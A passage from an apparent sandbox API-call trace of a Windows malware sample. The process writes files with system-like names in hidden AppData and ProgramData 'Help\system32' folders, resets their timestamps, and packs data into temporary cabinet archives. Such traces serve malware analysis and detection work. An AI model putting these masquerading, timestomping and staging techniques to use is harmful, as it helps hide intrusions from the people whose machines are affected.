dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.771] SetFileTime (hFile=0x150, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0066.771] CloseHandle (hObject=0x150) returned 1 [0066.771] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\mskfp32.ocx")) returned 1 [0066.772] SetLastError (dwErrCode=0x0) [0066.772] GetLastError () returned 0x0 [0066.772] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172baf0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.772] GetFileType (hFile=0x150) returned 0x1 [0066.772] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172bc1c | out: lpSystemTimeAsFileTime=0x172bc1c*(dwLowDateTime=0xf532bad0, dwHighDateTime=0x1d3dfba)) [0066.773] GetLastError () returned 0xb7 [0066.773] SetLastError (dwErrCode=0xb7) [0066.773] GetLastError () returned 0xb7 [0066.773] SetLastError (dwErrCode=0xb7) [0066.773] GetLastError () returned 0xb7 [0066.773] SetLastError (dwErrCode=0xb7) [0066.773] CloseHandle (hObject=0x150) returned 1 [0066.773] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.773] SetFileTime (hFile=0x150, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0066.773] CloseHandle (hObject=0x150) returned 1 [0066.773] FindFirstFileA (in: lpFileName="C:\\ProgramData\\Help\\system32\\mskfp32.ocx", lpFindFileData=0x172ddb0 | out: lpFindFileData=0x172ddb0) returned 0xffffffff [0066.773] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x172e114, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0066.773] wsprintfA (in: param_1=0x172e21c, param_2="%s\\Help\\%s\\%s" | out: param_1="C:\\ProgramData\\Help\\system32\\msvcrtd.tlb") returned 40 [0066.773] wsprintfA (in: param_1=0x172e42c, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0066.773] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb", lpFindFileData=0x172ddb8 | out: lpFindFileData=0x172ddb8) returned 0x358d80 [0066.773] FindClose (in: hFindFile=0x358d80 | out: hFindFile=0x358d80) returned 1 [0066.773] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172baf0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.774] GetFileType (hFile=0x150) returned 0x1 [0066.774] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172bc1c | out: lpSystemTimeAsFileTime=0x172bc1c*(dwLowDateTime=0xf532bad0, dwHighDateTime=0x1d3dfba)) [0066.774] GetLastError () returned 0xb7 [0066.774] SetLastError (dwErrCode=0xb7) [0066.774] GetLastError () returned 0xb7 [0066.774] SetLastError (dwErrCode=0xb7) [0066.774] GetLastError () returned 0xb7 [0066.774] SetLastError (dwErrCode=0xb7) [0066.774] CloseHandle (hObject=0x150) returned 1 [0066.774] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.774] SetFileTime (hFile=0x150, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0066.774] CloseHandle (hObject=0x150) returned 1 [0066.774] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x172dc4c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0066.774] GetTempFileNameA (in: lpPathName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpPrefixString="~fgh", uUnique=0x0, lpTempFileName=0x172db44 | out: lpTempFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF844.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf844.tmp")) returned 0xf844 [0066.775] LoadLibraryA (lpLibFileName="CABINET") returned 0x72d70000 [0066.776] GetProcAddress (hModule=0x72d70000, lpProcName="FCICreate") returned 0x72d78e91 [0066.776] GetProcAddress (hModule=0x72d70000, lpProcName="FCIAddFile") returned 0x72d78cd4 [0066.776] GetProcAddress (hModule=0x72d70000, lpProcName="FCIFlushCabinet") returned 0x72d78db8 [0066.777] GetProcAddress (hModule=0x72d70000, lpProcName="FCIFlushFolder") returned 0x72d78e16 [0066.777] GetProcAddress (hModule=0x72d70000, lpProcName="FCIDestroy") returned 0x72d78e46 [0066.777] GetProcAddress (hModule=0x72d70000, lpProcName="FDICreate") returned 0x72d71c3f [0066.777] GetProcAddress (hModule=0x72d70000, lpProcName="FDIIsCabinet") returned 0x72d759bd [0066.777] GetProcAddress (hModule=0x72d70000, lpProcName="FDICopy") returned 0x72d71849 [0066.777] GetProcAddress (hModule=0x72d70000, lpProcName="FDIDestroy") returned 0x72d71693 [0066.777] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.777] CloseHandle (hObject=0x150) returned 1 [0066.777] FCICreate () returned 0x300d78 [0066.778] GetLastError () returned 0x0 [0066.778] SetLastError (dwErrCode=0x0) [0066.778] GetLastError () returned 0x0 [0066.778] SetLastError (dwErrCode=0x0) [0066.778] GetLastError () returned 0x0 [0066.778] SetLastError (dwErrCode=0x0) [0066.778] GetLastError () returned 0x0 [0066.778] SetLastError (dwErrCode=0x0) [0066.778] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx12" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx12")) returned 0xffffffff [0066.778] GetLastError () returned 0x2 [0066.778] GetLastError () returned 0x2 [0066.778] SetLastError (dwErrCode=0x2) [0066.778] GetLastError () returned 0x2 [0066.778] SetLastError (dwErrCode=0x2) [0066.778] GetLastError () returned 0x2 [0066.778] SetLastError (dwErrCode=0x2) [0066.778] GetLastError () returned 0x2 [0066.778] SetLastError (dwErrCode=0x2) [0066.778] GetLastError () returned 0x2 [0066.778] SetLastError (dwErrCode=0x2) [0066.778] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx12" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx12"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5b0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.779] GetFileType (hFile=0x150) returned 0x1 [0066.779] GetLastError () returned 0x0 [0066.779] SetLastError (dwErrCode=0x0) [0066.779] GetLastError () returned 0x0 [0066.779] SetLastError (dwErrCode=0x0) [0066.779] GetLastError () returned 0x0 [0066.779] SetLastError (dwErrCode=0x0) [0066.779] GetLastError () returned 0x0 [0066.779] SetLastError (dwErrCode=0x0) [0066.779] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx13" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx13")) returned 0xffffffff [0066.779] GetLastError () returned 0x2 [0066.779] GetLastError () returned 0x2 [0066.779] SetLastError (dwErrCode=0x2) [0066.779] GetLastError () returned 0x2 [0066.779] SetLastError (dwErrCode=0x2) [0066.779] GetLastError () returned 0x2 [0066.779] SetLastError (dwErrCode=0x2) [0066.779] GetLastError () returned 0x2 [0066.779] SetLastError (dwErrCode=0x2) [0066.779] GetLastError () returned 0x2 [0066.779] SetLastError (dwErrCode=0x2) [0066.779] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx13" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx13"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5b0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.780] GetFileType (hFile=0x154) returned 0x1 [0066.780] GetLastError () returned 0x0 [0066.780] SetLastError (dwErrCode=0x0) [0066.780] GetLastError () returned 0x0 [0066.780] SetLastError (dwErrCode=0x0) [0066.780] GetLastError () returned 0x0 [0066.780] SetLastError (dwErrCode=0x0) [0066.780] GetLastError () returned 0x0 [0066.780] SetLastError (dwErrCode=0x0) [0066.780] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx14" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx14")) returned 0xffffffff [0066.780] GetLastError () returned 0x2 [0066.780] GetLastError () returned 0x2 [0066.780] SetLastError (dwErrCode=0x2) [0066.780] GetLastError () returned 0x2 [0066.780] SetLastError (dwErrCode=0x2) [0066.780] GetLastError () returned 0x2 [0066.780] SetLastError (dwErrCode=0x2) [0066.780] GetLastError () returned 0x2 [0066.780] SetLastError (dwErrCode=0x2) [0066.780] GetLastError () returned 0x2 [0066.780] SetLastError (dwErrCode=0x2) [0066.781] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx14" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx14"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5ac, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.781] GetFileType (hFile=0x158) returned 0x1 [0066.781] GetLastError () returned 0x0 [0066.781] SetLastError (dwErrCode=0x0) [0066.781] GetLastError () returned 0x0 [0066.781] SetLastError (dwErrCode=0x0) [0066.781] GetLastError () returned 0x0 [0066.781] SetLastError (dwErrCode=0x0) [0066.781] GetLastError () returned 0x0 [0066.781] SetLastError (dwErrCode=0x0) [0066.781] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx15" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx15")) returned 0xffffffff [0066.781] GetLastError () returned 0x2 [0066.781] GetLastError () returned 0x2 [0066.781] SetLastError (dwErrCode=0x2) [0066.781] GetLastError () returned 0x2 [0066.781] SetLastError (dwErrCode=0x2) [0066.781] GetLastError () returned 0x2 [0066.781] SetLastError (dwErrCode=0x2) [0066.781] GetLastError () returned 0x2 [0066.781] SetLastError (dwErrCode=0x2) [0066.781] GetLastError () returned 0x2 [0066.781] SetLastError (dwErrCode=0x2) [0066.782] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx15" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx15"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5ac, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0066.782] GetFileType (hFile=0x160) returned 0x1 [0066.782] GetLastError () returned 0x0 [0066.782] SetLastError (dwErrCode=0x0) [0066.782] GetLastError () returned 0x0 [0066.782] SetLastError (dwErrCode=0x0) [0066.782] GetLastError () returned 0x0 [0066.782] SetLastError (dwErrCode=0x0) [0066.782] GetLastError () returned 0x0 [0066.782] SetLastError (dwErrCode=0x0) [0066.782] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx16" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx16")) returned 0xffffffff [0066.782] GetLastError () returned 0x2 [0066.782] GetLastError () returned 0x2 [0066.782] SetLastError (dwErrCode=0x2) [0066.782] GetLastError () returned 0x2 [0066.782] SetLastError (dwErrCode=0x2) [0066.782] GetLastError () returned 0x2 [0066.782] SetLastError (dwErrCode=0x2) [0066.782] GetLastError () returned 0x2 [0066.782] SetLastError (dwErrCode=0x2) [0066.782] GetLastError () returned 0x2 [0066.783] SetLastError (dwErrCode=0x2) [0066.783] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx16" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx16"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5ac, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0066.783] GetFileType (hFile=0x15c) returned 0x1 [0066.783] FCIAddFile () returned 0x1 [0066.783] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x14c [0066.783] GetFileInformationByHandle (in: hFile=0x14c, lpFileInformation=0x172d684 | out: lpFileInformation=0x172d684) returned 1 [0066.784] FileTimeToLocalFileTime (in: lpFileTime=0x172d698, lpLocalFileTime=0x172d67c | out: lpLocalFileTime=0x172d67c) returned 1 [0066.784] FileTimeToDosDateTime (in: lpFileTime=0x172d67c, lpFatDate=0x172d6ee, lpFatTime=0x172d6f0 | out: lpFatDate=0x172d6ee, lpFatTime=0x172d6f0) returned 1 [0066.784] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb")) returned 0x2020 [0066.784] CloseHandle (hObject=0x14c) returned 1 [0066.784] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0066.784] GetFileType (hFile=0x14c) returned 0x1 [0066.784] ReadFile (in: hFile=0x14c, lpBuffer=0x17701a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d648, lpOverlapped=0x0 | out: lpBuffer=0x17701a8*, lpNumberOfBytesRead=0x172d648*=0x419, lpOverlapped=0x0) returned 1 [0066.784] GetLastError () returned 0x0 [0066.784] SetLastError (dwErrCode=0x0) [0066.784] ReadFile (in: hFile=0x14c, lpBuffer=0x17705c1, nNumberOfBytesToRead=0x7be7, lpNumberOfBytesRead=0x172d648, lpOverlapped=0x0 | out: lpBuffer=0x17705c1*, lpNumberOfBytesRead=0x172d648*=0x0, lpOverlapped=0x0) returned 1 [0066.784] GetLastError () returned 0x0 [0066.784] SetLastError (dwErrCode=0x0) [0066.784] CloseHandle (hObject=0x14c) returned 1 [0066.785] FCIFlushCabinet () returned 0x1 [0066.786] GetLastError () returned 0x0 [0066.786] SetLastError (dwErrCode=0x0) [0066.787] GetLastError () returned 0x0 [0066.787] SetLastError (dwErrCode=0x0) [0066.787] GetLastError () returned 0x0 [0066.787] SetLastError (dwErrCode=0x0) [0066.787] GetLastError () returned 0x0 [0066.787] SetLastError (dwErrCode=0x0) [0066.787] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx17" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx17")) returned 0xffffffff [0066.787] GetLastError () returned 0x2 [0066.787] GetLastError () returned 0x2 [0066.787] SetLastError (dwErrCode=0x2) [0066.787] GetLastError () returned 0x2 [0066.787] SetLastError (dwErrCode=0x2) [0066.787] GetLastError () returned 0x2 [0066.787] SetLastError (dwErrCode=0x2) [0066.787] GetLastError () returned 0x2 [0066.787] SetLastError (dwErrCode=0x2) [0066.787] GetLastError () returned 0x2 [0066.787] SetLastError (dwErrCode=0x2) [0066.787] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx17" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx17"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d39c, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0066.787] GetFileType (hFile=0x14c) returned 0x1 [0066.788] GetLastError () returned 0x0 [0066.788] SetLastError (dwErrCode=0x0) [0066.788] GetLastError () returned 0x0 [0066.788] SetLastError (dwErrCode=0x0) [0066.788] GetLastError () returned 0x0 [0066.788] SetLastError (dwErrCode=0x0) [0066.788] GetLastError () returned 0x0 [0066.788] SetLastError (dwErrCode=0x0) [0066.788] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx18" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx18")) returned 0xffffffff [0066.788] GetLastError () returned 0x2 [0066.788] GetLastError () returned 0x2 [0066.788] SetLastError (dwErrCode=0x2) [0066.788] GetLastError () returned 0x2 [0066.788] SetLastError (dwErrCode=0x2) [0066.788] GetLastError () returned 0x2 [0066.788] SetLastError (dwErrCode=0x2) [0066.788] GetLastError () returned 0x2 [0066.788] SetLastError (dwErrCode=0x2) [0066.788] GetLastError () returned 0x2 [0066.788] SetLastError (dwErrCode=0x2) [0066.788] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx18" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx18"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d39c, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0066.788] GetFileType (hFile=0x140) returned 0x1 [0066.789] ReadFile (in: hFile=0x150, lpBuffer=0x300db8, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x172d3f4, lpOverlapped=0x0 | out: lpBuffer=0x300db8*, lpNumberOfBytesRead=0x172d3f4*=0x8, lpOverlapped=0x0) returned 1 [0066.789] ReadFile (in: hFile=0x150, lpBuffer=0x1768190, nNumberOfBytesToRead=0x39e, lpNumberOfBytesRead=0x172d3f4, lpOverlapped=0x0 | out: lpBuffer=0x1768190*, lpNumberOfBytesRead=0x172d3f4*=0x39e, lpOverlapped=0x0) returned 1 [0066.790] ReadFile (in: hFile=0x150, lpBuffer=0x300db8, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x172d3f4, lpOverlapped=0x0 | out: lpBuffer=0x300db8*, lpNumberOfBytesRead=0x172d3f4*=0x0, lpOverlapped=0x0) returned 1 [0066.790] GetLastError () returned 0x0 [0066.790] SetLastError (dwErrCode=0x0) [0066.791] ReadFile (in: hFile=0x154, lpBuffer=0x303fa0, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x172d3fc, lpOverlapped=0x0 | out: lpBuffer=0x303fa0*, lpNumberOfBytesRead=0x172d3fc*=0x10, lpOverlapped=0x0) returned 1 [0066.791] ReadFile (in: hFile=0x154, lpBuffer=0x3040c6, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x172d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3040c6*, lpNumberOfBytesRead=0x172d3b8*=0xc, lpOverlapped=0x0) returned 1 [0066.791] GetLastError () returned 0x0 [0066.791] SetLastError (dwErrCode=0x0) [0066.792] ReadFile (in: hFile=0x154, lpBuffer=0x303fa0, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x172d3fc, lpOverlapped=0x0 | out: lpBuffer=0x303fa0*, lpNumberOfBytesRead=0x172d3fc*=0x0, lpOverlapped=0x0) returned 1 [0066.792] GetLastError () returned 0x0 [0066.792] SetLastError (dwErrCode=0x0) [0066.792] CloseHandle (hObject=0x150) returned 1 [0066.793] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx12" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx12")) returned 1 [0066.793] CloseHandle (hObject=0x154) returned 1 [0066.794] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx13" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx13")) returned 1 [0066.795] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF844.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf844.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d510, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.795] GetFileType (hFile=0x154) returned 0x1 [0066.796] ReadFile (in: hFile=0x15c, lpBuffer=0x300db8, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x172d554, lpOverlapped=0x0 | out: lpBuffer=0x300db8*, lpNumberOfBytesRead=0x172d554*=0x8, lpOverlapped=0x0) returned 1 [0066.796] ReadFile (in: hFile=0x15c, lpBuffer=0x300db8, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x172d554, lpOverlapped=0x0 | out: lpBuffer=0x300db8*, lpNumberOfBytesRead=0x172d554*=0x0, lpOverlapped=0x0) returned 1 [0066.796] GetLastError () returned 0xb7 [0066.796] SetLastError (dwErrCode=0xb7) [0066.796] ReadFile (in: hFile=0x160, lpBuffer=0x17781b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d51c, lpOverlapped=0x0 | out: lpBuffer=0x17781b0*, lpNumberOfBytesRead=0x172d51c*=0x1c, lpOverlapped=0x0) returned 1 [0066.797] GetLastError () returned 0xb7 [0066.797] SetLastError (dwErrCode=0xb7) [0066.797] ReadFile (in: hFile=0x160, lpBuffer=0x17781b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d51c, lpOverlapped=0x0 | out: lpBuffer=0x17781b0*, lpNumberOfBytesRead=0x172d51c*=0x0, lpOverlapped=0x0) returned 1 [0066.797] GetLastError () returned 0xb7 [0066.797] SetLastError (dwErrCode=0xb7) [0066.797] ReadFile (in: hFile=0x158, lpBuffer=0x17781b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d51c, lpOverlapped=0x0 | out: lpBuffer=0x17781b0*, lpNumberOfBytesRead=0x172d51c*=0x3a6, lpOverlapped=0x0) returned 1 [0066.797] GetLastError () returned 0xb7 [0066.797] SetLastError (dwErrCode=0xb7) [0066.798] ReadFile (in: hFile=0x158, lpBuffer=0x17781b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d51c, lpOverlapped=0x0 | out: lpBuffer=0x17781b0*, lpNumberOfBytesRead=0x172d51c*=0x0, lpOverlapped=0x0) returned 1 [0066.798] GetLastError () returned 0xb7 [0066.798] SetLastError (dwErrCode=0xb7) [0066.798] CloseHandle (hObject=0x154) returned 1 [0066.798] CloseHandle (hObject=0x158) returned 1 [0066.799] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx14" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx14")) returned 1 [0066.800] CloseHandle (hObject=0x160) returned 1 [0066.800] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx15" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx15")) returned 1 [0066.801] CloseHandle (hObject=0x15c) returned 1 [0066.801] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx16" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx16")) returned 1 [0066.802] GetLastError () returned 0xb7 [0066.802] SetLastError (dwErrCode=0xb7) [0066.802] GetLastError () returned 0xb7 [0066.802] SetLastError (dwErrCode=0xb7) [0066.802] GetLastError () returned 0xb7 [0066.802] SetLastError (dwErrCode=0xb7) [0066.802] GetLastError () returned 0xb7 [0066.802] SetLastError (dwErrCode=0xb7) [0066.802] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx19" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx19")) returned 0xffffffff [0066.802] GetLastError () returned 0x2 [0066.802] GetLastError () returned 0x2 [0066.802] SetLastError (dwErrCode=0x2) [0066.802] GetLastError () returned 0x2 [0066.802] SetLastError (dwErrCode=0x2) [0066.802] GetLastError () returned 0x2 [0066.802] SetLastError (dwErrCode=0x2) [0066.802] GetLastError () returned 0x2 [0066.802] SetLastError (dwErrCode=0x2) [0066.802] GetLastError () returned 0x2 [0066.802] SetLastError (dwErrCode=0x2) [0066.802] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx19" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx19"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d4d0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0066.803] GetFileType (hFile=0x15c) returned 0x1 [0066.803] GetLastError () returned 0x0 [0066.803] SetLastError (dwErrCode=0x0) [0066.803] GetLastError () returned 0x0 [0066.803] SetLastError (dwErrCode=0x0) [0066.803] GetLastError () returned 0x0 [0066.803] SetLastError (dwErrCode=0x0) [0066.803] GetLastError () returned 0x0 [0066.803] SetLastError (dwErrCode=0x0) [0066.803] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx20" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx20")) returned 0xffffffff [0066.803] GetLastError () returned 0x2 [0066.803] GetLastError () returned 0x2 [0066.803] SetLastError (dwErrCode=0x2) [0066.803] GetLastError () returned 0x2 [0066.803] SetLastError (dwErrCode=0x2) [0066.803] GetLastError () returned 0x2 [0066.803] SetLastError (dwErrCode=0x2) [0066.803] GetLastError () returned 0x2 [0066.803] SetLastError (dwErrCode=0x2) [0066.803] GetLastError () returned 0x2 [0066.803] SetLastError (dwErrCode=0x2) [0066.803] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx20" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx20"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d4d0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0066.804] GetFileType (hFile=0x160) returned 0x1 [0066.804] GetLastError () returned 0x0 [0066.804] SetLastError (dwErrCode=0x0) [0066.804] GetLastError () returned 0x0 [0066.804] SetLastError (dwErrCode=0x0) [0066.804] GetLastError () returned 0x0 [0066.804] SetLastError (dwErrCode=0x0) [0066.804] GetLastError () returned 0x0 [0066.804] SetLastError (dwErrCode=0x0) [0066.804] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx21" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx21")) returned 0xffffffff [0066.804] GetLastError () returned 0x2 [0066.804] GetLastError () returned 0x2 [0066.804] SetLastError (dwErrCode=0x2) [0066.804] GetLastError () returned 0x2 [0066.804] SetLastError (dwErrCode=0x2) [0066.804] GetLastError () returned 0x2 [0066.804] SetLastError (dwErrCode=0x2) [0066.804] GetLastError () returned 0x2 [0066.804] SetLastError (dwErrCode=0x2) [0066.804] GetLastError () returned 0x2 [0066.804] SetLastError (dwErrCode=0x2) [0066.804] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx21" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx21"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d4d0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.805] GetFileType (hFile=0x158) returned 0x1 [0066.805] FCIDestroy () returned 